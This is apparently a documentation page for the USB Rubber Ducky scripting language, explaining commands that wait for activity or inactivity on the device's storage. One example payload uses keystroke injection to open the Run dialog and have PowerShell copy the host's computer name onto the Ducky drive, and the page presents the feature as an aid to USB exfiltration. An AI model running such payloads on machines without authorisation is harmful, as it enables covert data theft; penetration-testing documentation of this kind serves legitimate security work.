Storage Activity

Overview

Storage activity is an experimental feature that can be used to detect whether the storage device is in use when running ATTACKMODE STORAGE. This can be helpful when performing USB exfiltration. It can also be used to determine whether the storage device has been activated, which is useful for VID and PID enumeration.

Results may vary greatly depending on the target OS. Some operating systems may keep storage active for an exceptionally long time.

WAIT_FOR_STORAGE_ACTIVITY

The WAIT_FOR_STORAGE_ACTIVITY command blocks all further payload execution until activity on the USB Rubber Ducky storage has been detected.

Example

REM Example WAIT_FOR_STORAGE_ACTIVITY Payload

ATTACKMODE HID STORAGE
DELAY 2000
LED_OFF
STRINGLN Waiting for the disk to be read from or written to...
$_STORAGE_ACTIVITY_TIMEOUT = 10000
WAIT_FOR_STORAGE_ACTIVITY
LED_OFF
LED_R

Result

  • The LED will light red after storage activity has been detected.

WAIT_FOR_STORAGE_INACTIVITY

The WAIT_FOR_STORAGE_INACTIVITY command blocks all further payload execution until the storage device is determined to be inactive.

Example

REM Example WAIT_FOR_STORAGE_INACTIVITY Payload

ATTACKMODE HID STORAGE
DELAY 2000
LED_OFF

GUI r
DELAY 100
STRING powershell "$m=(Get-Volume -FileSystemLabel 'DUCKY').DriveLetter;
STRINGLN echo $env:computername >> $m:\computer_names.txt" 

$_STORAGE_ACTIVITY_TIMEOUT = 10000
WAIT_FOR_STORAGE_INACTIVITY
LED_OFF
LED_R

Result

  • The LED will light red when the storage device becomes inactive.

Internal Variables

The following internal variables relate to storage activity and may be used in your payload for advanced functions.

$_STORAGE_ACTIVITY_TIMEOUT

While the payload is running, this value decrements whenever storage activity is not detected.

The default value is 1000.
